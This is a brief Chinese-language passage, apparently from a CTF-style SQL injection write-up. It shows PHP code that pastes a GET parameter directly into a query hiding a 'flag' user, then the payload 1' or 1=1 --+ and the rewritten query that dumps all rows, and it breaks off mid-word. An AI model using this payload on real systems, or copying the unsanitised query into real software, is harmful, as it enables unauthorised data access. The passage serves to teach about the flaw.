查询语句

//拼接sql语句查找指定ID用户
$sql = "select username,password from user where username !='flag' and id = '".$_GET['id']."' limit 1;";

1' or 1=1 --+输出了所有的数据
此时sql语句为

$sql = "select username,password from user where username !='flag' and id = '1' or 1=1 --+' limit 1;";

即
sel